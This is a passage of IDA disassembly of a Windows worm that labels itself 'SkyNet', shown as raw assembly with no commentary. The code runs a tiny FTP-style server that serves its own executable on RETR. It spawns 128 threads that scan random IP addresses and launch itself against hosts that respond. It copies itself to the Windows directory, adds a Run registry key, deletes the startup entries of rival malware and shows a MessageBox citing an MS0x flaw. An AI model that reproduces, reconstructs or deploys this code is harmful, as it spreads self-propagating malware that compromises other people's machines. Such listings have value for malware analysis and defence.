push eax ; Str
call _strtok
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C68: ; CODE XREF: sub_401B59+159�j
test ebx, ebx
jz short loc_401C9C
cmp edi, 4
jge short loc_401C7F
push ebx
call sub_401E8B
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C7F: ; CODE XREF: sub_401B59+116�j
jnz short loc_401C8B
push ebx
call sub_401E8B
pop ecx
mov [ebp+var_18], eax
loc_401C8B: ; CODE XREF: sub_401B59:loc_401C7F�j
cmp edi, 5
jnz short loc_401C9F
push ebx
call sub_401E8B
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C9F
; ---------------------------------------------------------------------------
loc_401C9C: ; CODE XREF: sub_401B59+111�j
push 6
pop edi
loc_401C9F: ; CODE XREF: sub_401B59+135�j
; sub_401B59+141�j
lea eax, [ebp+Delim]
push eax ; Delim
push 0 ; Str
call _strtok
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C68
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050F0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0 ; Str
call _strlen
pop ecx
push eax
push off_4068E0
jmp loc_401E32
; ---------------------------------------------------------------------------
loc_401CF5: ; CODE XREF: sub_401B59+D5�j
lea eax, [ebp+Str]
push offset aRetr ; "RETR"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_401E37
push 0
push off_4068E4 ; Str
call _strlen
pop ecx
push eax
push off_4068E4
push ebx
call esi ; dword_405118
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401E14
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push edi
call dword_40511C
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_405120
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401E14
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_405124
cmp eax, 0FFFFFFFFh
jnz short loc_401D95
push ebx
call dword_405128
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401D95: ; CODE XREF: sub_401B59+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405034 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401E14
lea eax, [ebp+var_2]
push offset Source ; Source
push eax ; Dest
call _strcpy
mov ebx, dword_405030
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401DDF: ; CODE XREF: sub_401B59+2A6�j
call ebx ; dword_405030
cmp eax, 1
jnz short loc_401E01
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; dword_405118
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401DDF
; ---------------------------------------------------------------------------
loc_401E01: ; CODE XREF: sub_401B59+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
lea eax, [ebp+var_60]
push eax ; Str
call sub_401210
pop ecx
loc_401E14: ; CODE XREF: sub_401B59+1DD�j
; sub_401B59+21B�j ...
push [ebp+var_C]
call dword_405128
push 0
push off_4068DC ; Str
call _strlen
pop ecx
push eax
push off_4068DC
loc_401E32: ; CODE XREF: sub_401B59+197�j
push [ebp+arg_0]
jmp short loc_401E6D
; ---------------------------------------------------------------------------
loc_401E37: ; CODE XREF: sub_401B59+1B1�j
lea eax, [ebp+Str]
push offset aQuit ; "QUIT"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401E57
push ebx
call dword_405128
jmp short loc_401E6F
; ---------------------------------------------------------------------------
loc_401E57: ; CODE XREF: sub_401B59+2F3�j
push 0
push off_4068DC ; Str
call _strlen
pop ecx
push eax
push off_4068DC
loc_401E6C: ; CODE XREF: sub_401B59+8A�j
; sub_401B59+BB�j
push ebx
loc_401E6D: ; CODE XREF: sub_401B59+2DC�j
call esi ; dword_405118
loc_401E6F: ; CODE XREF: sub_401B59+2FC�j
cmp [ebp+var_10], 0
jg loc_401B94
push [ebp+arg_0]
call dword_405128
pop edi
pop esi
loc_401E84: ; CODE XREF: sub_401B59+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B59 endp
; =============== S U B R O U T I N E =======================================
sub_401E8B proc near ; CODE XREF: sub_401B59+119�p
; sub_401B59+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E93: ; CODE XREF: sub_401E8B+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E9D
cmp al, 9
jnz short loc_401EA0
loc_401E9D: ; CODE XREF: sub_401E8B+C�j
inc esi
jmp short loc_401E93
; ---------------------------------------------------------------------------
loc_401EA0: ; CODE XREF: sub_401E8B+10�j
; sub_401E8B+2E�j
movsx eax, byte ptr [esi]
push eax ; C
call _isalnum
test eax, eax
pop ecx
jz short loc_401EBB
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401EA0
; ---------------------------------------------------------------------------
loc_401EBB: ; CODE XREF: sub_401E8B+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EC0 proc near ; DATA XREF: WinMain(x,x,x,x)+6E�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401EE4
loc_401EDC: ; CODE XREF: sub_401EC0+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401EE4: ; CODE XREF: sub_401EC0+1A�j
push 3FFh
mov [ebp+var_14], 2
call dword_40511C
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_405108
cmp eax, 0FFFFFFFFh
jz short loc_401F1C
push 5
push edi
call dword_40510C
cmp eax, 0FFFFFFFFh
jnz short loc_401F25
loc_401F1C: ; CODE XREF: sub_401EC0+4C�j
push edi
call dword_405128
jmp short loc_401EDC
; ---------------------------------------------------------------------------
loc_401F25: ; CODE XREF: sub_401EC0+5A�j
; sub_401EC0+89�j
push esi
push esi
push edi
call dword_405110
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B59
push esi
push esi
call dword_40503C ; CreateThread
push 19h
call dword_40502C ; Sleep
jmp short loc_401F25
sub_401EC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401F4B proc near ; DATA XREF: WinMain(x,x,x,x)+82�o
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
Source = byte ptr -454h
var_450 = byte ptr -450h
var_438 = byte ptr -438h
Dest = byte ptr -400h
sub esp, 45Ch
push ebx
push ebp
push esi
push edi
push 0FFFFFFFFh
call dword_405048 ; GetCurrentThread
push eax
call dword_405044 ; SetThreadPriority
loc_401F64: ; CODE XREF: sub_401F4B+37�j
xor esi, esi
lea eax, [esp+46Ch+var_458]
push esi
push eax
mov [esp+474h+var_458], esi
call dword_4050FC
cmp eax, esi
jnz short loc_401F84
push 19h
call dword_40502C ; Sleep
jmp short loc_401F64
; ---------------------------------------------------------------------------
loc_401F84: ; CODE XREF: sub_401F4B+2D�j
lea eax, [esp+46Ch+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+46Ch+var_438]
push eax
call dword_405134
movsx ebp, al
movsx eax, ah
mov [esp+46Ch+var_45C], eax
cmp ebp, esi
mov eax, 100h
jge short loc_401FAF
add ebp, eax
loc_401FAF: ; CODE XREF: sub_401F4B+60�j
cmp [esp+46Ch+var_45C], esi
jge short loc_401FB9
add [esp+46Ch+var_45C], eax
loc_401FB9: ; CODE XREF: sub_401F4B+68�j
mov edi, dword_4050F0
mov esi, 0FFh
mov ebx, offset aI_I_I_I ; "%i.%i.%i.%i"
loc_401FC9: ; CODE XREF: sub_401F4B+189�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_402029
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_40200C
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_402026
; ---------------------------------------------------------------------------
loc_40200C: ; CODE XREF: sub_401F4B+9C�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push [esp+474h+var_45C]
loc_402026: ; CODE XREF: sub_401F4B+BF�j
push ebp
jmp short loc_402055
; ---------------------------------------------------------------------------
loc_402029: ; CODE XREF: sub_401F4B+8C�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_402055: ; CODE XREF: sub_401F4B+DC�j
lea eax, [esp+47Ch+Source]
push ebx
push eax
call edi ; dword_4050F0
add esp, 18h
lea eax, [esp+468h+var_450]
push 3E8h
push eax
call dword_405134
push eax
call sub_401B1B
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4020CC
lea eax, [esp+46Ch+Source]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_4020CC
lea eax, [esp+46Ch+Dest]
push 400h
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [esp+46Ch+Dest]
push offset asc_406A84 ; " "
push eax ; Dest
call _strcat
lea eax, [esp+474h+Source]
push eax ; Source
lea eax, [esp+478h+Dest]
push eax ; Dest
call _strcat
add esp, 10h
lea eax, [esp+46Ch+Dest]
push 0
push eax
call dword_405040 ; WinExec
loc_4020CC: ; CODE XREF: sub_401F4B+130�j
; sub_401F4B+13F�j
push 19h
call dword_40502C ; Sleep
jmp loc_401FC9
sub_401F4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+C9�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
Str = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
call dword_405054 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+Str] ; Str
call _strlen
pop ecx
test eax, eax
pop ecx
jbe short loc_40210D
push [ebp+Str]
call sub_401A69
pop ecx
push 1
pop eax
locret_402109: ; CODE XREF: WinMain(x,x,x,x)+5F�j
leave
retn 10h
; ---------------------------------------------------------------------------
loc_40210D: ; CODE XREF: WinMain(x,x,x,x)+22�j
push esi
push edi
push 1
call sub_40219B
xor esi, esi
mov [esp+14h+var_14], offset aSkynetnotice ; "SkynetNotice"
push esi
push esi
call dword_405050 ; CreateMutexA
call dword_40504C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_40213A
pop edi
xor eax, eax
pop esi
jmp short locret_402109
; ---------------------------------------------------------------------------
loc_40213A: ; CODE XREF: WinMain(x,x,x,x)+59�j
mov edi, dword_40503C
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401EC0
push esi
push esi
call edi ; dword_40503C
mov ebx, 80h
loc_402155: ; CODE XREF: WinMain(x,x,x,x)+8C�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401F4B
push esi
push esi
call edi ; dword_40503C
dec ebx
jnz short loc_402155
xor edi, edi
pop ebx
loc_40216A: ; CODE XREF: WinMain(x,x,x,x)+AA�j
; WinMain(x,x,x,x)+C0�j
push esi
call dword_405008
push 3E8h
call dword_40502C ; Sleep
inc edi
cmp edi, 1C20h
jle short loc_40216A
push esi
push offset aSkynet ; "SkyNet"
push offset a1_YourComputer ; "1. Your computer is affected by the MS0"...
push esi
xor edi, edi
call dword_4050F4 ; MessageBoxA
jmp short loc_40216A
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40219B proc near ; CODE XREF: WinMain(x,x,x,x)+38�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
Dest = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
push edi
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [ebp+Dest]
push esi
push eax
call dword_40505C ; GetWindowsDirectoryA
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp [ebp+eax+var_425], 5Ch
pop ecx
jz short loc_4021F3
lea eax, [ebp+Dest]
push offset asc_406C50 ; "\\"
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_4021F3: ; CODE XREF: sub_40219B+43�j
push off_4068C8 ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcat
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_402223
lea eax, [ebp+Dest]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_405058 ; CopyFileA
loc_402223: ; CODE XREF: sub_40219B+70�j
lea eax, [ebp+var_4]
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push eax
push esi
push 80000002h
call dword_40500C
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405004
push [ebp+var_4]
call dword_405000
push offset aSsgrate_exe ; "ssgrate.exe"
mov edi, 80000001h
push esi
push edi
call sub_401AED
push offset aDrvsys_exe ; "drvsys.exe"
push esi
push edi
call sub_401AED
push offset aDrvddll_exe ; "Drvddll_exe"
push esi
push edi
call sub_401AED
add esp, 24h
pop edi
pop esi
leave
retn
sub_40219B endp
; ---------------------------------------------------------------------------
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION _isalnum. PRESS KEYPAD "+" TO EXPAND]
; [000000D7 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call __exit
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
; [000000B6 BYTES: COLLAPSED FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000141 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [000001B4 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_406F1C
jmp short loc_403590
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_2: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000153 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000149 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000199 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [00000185 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [0000032B BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D96 proc near ; CODE XREF: sub_401B1B+33�p
jmp dword_405148
sub_404D96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D9C proc near ; CODE XREF: sub_401B1B+24�p
jmp dword_405140
sub_404D9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404DA2 proc near ; CODE XREF: sub_401B1B+7�p
jmp dword_405144
sub_404DA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404DA8 proc near ; CODE XREF: __global_unwind2+13�p
jmp dword_40508C
sub_404DA8 endp
; ---------------------------------------------------------------------------
align 10h
dd 94h dup(0)
dword_405000 dd 0 ; sub_40219B+C8�r
dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 ; sub_40219B+97�r
dword_405010 dd 0 align 8
dword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40126C+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B59+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C835406h ; resolved to->KERNEL32._llseekdword_405028 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_40502C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401583+4D0�r ...
dword_405030 dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405034 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405038 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401F4B+14D�r ...
dword_40503C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; WinMain(x,x,x,x):loc_40213A�r
dword_405040 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405044 dd 7C80C108h ; resolved to->KERNEL32.SetThreadPrioritydword_405048 dd 7C8098EBh ; resolved to->KERNEL32.GetCurrentThreaddword_40504C dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405050 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_405054 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405058 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_40505C dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405060 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405064 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_405068 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; ___sbh_alloc_new_group+51�r
dword_40506C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; ___sbh_heap_init+D�r ...
dword_405070 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405074 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_405078 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; _setSBUpLow+14�r
dword_40507C dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; ___crtGetStringTypeA+12D�r
dword_405080 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; ___crtGetStringTypeA+8D�r
dword_405084 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; ___crtGetStringTypeA+11B�r ...
dword_405088 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_40508C dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405090 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; ___sbh_free_block+2C4�r ...
dword_405094 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_405098 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_40509C dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_4050A0 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; __ioinit+166�r
dword_4050A4 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; __NMSG_WRITE+143�r
dword_4050A8 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050AC dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; ___crtLCMapStringA+14D�r ...
dword_4050B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4050B4 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; ___crtLCMapStringA+A7�r
dword_4050B8 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050BC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; ___crtGetEnvironmentStringsA+E1�r
dword_4050C0 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; ___crtLCMapStringA+20D�r
dword_4050C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050C8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050CC dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_4050D0 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050D4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050D8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; _doexit+91�r
dword_4050DC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050E0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050E4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050E8 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA align 10h
dword_4050F0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40137D+26�r ...
dword_4050F4 dd 7E45058Ah ; resolved to->USER32.MessageBoxA dd 0
dword_4050FC dd 0 dd 0
dword_405104 dd 0 dword_405108 dd 0 dword_40510C dd 0 dword_405110 dd 0 dword_405114 dd 0 ; sub_401583+2DD�r ...
dword_405118 dd 0 ; sub_40137D+151�r ...
dword_40511C dd 0 ; sub_40126C+27�r ...
dword_405120 dd 0 ; sub_40126C+51�r ...
dword_405124 dd 0 ; sub_40126C+6C�r ...
dword_405128 dd 0 ; sub_40126C+105�r ...
dword_40512C dd 0 dword_405130 dd 0 dword_405134 dd 0 ; sub_4011D5+7�r ...
dword_405138 dd 0 ; sub_4011D5+1E�r ...
align 10h
dword_405140 dd 0 dword_405144 dd 0 dword_405148 dd 0 align 10h
dword_405150 dd 0FFFFFFFFh, 402A05h, 402A19h, 746E7572h, 20656D69h dd 6F727265h, 2072h, 534F4C54h, 72652053h, 0D726F72h, 0Ah
dd 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
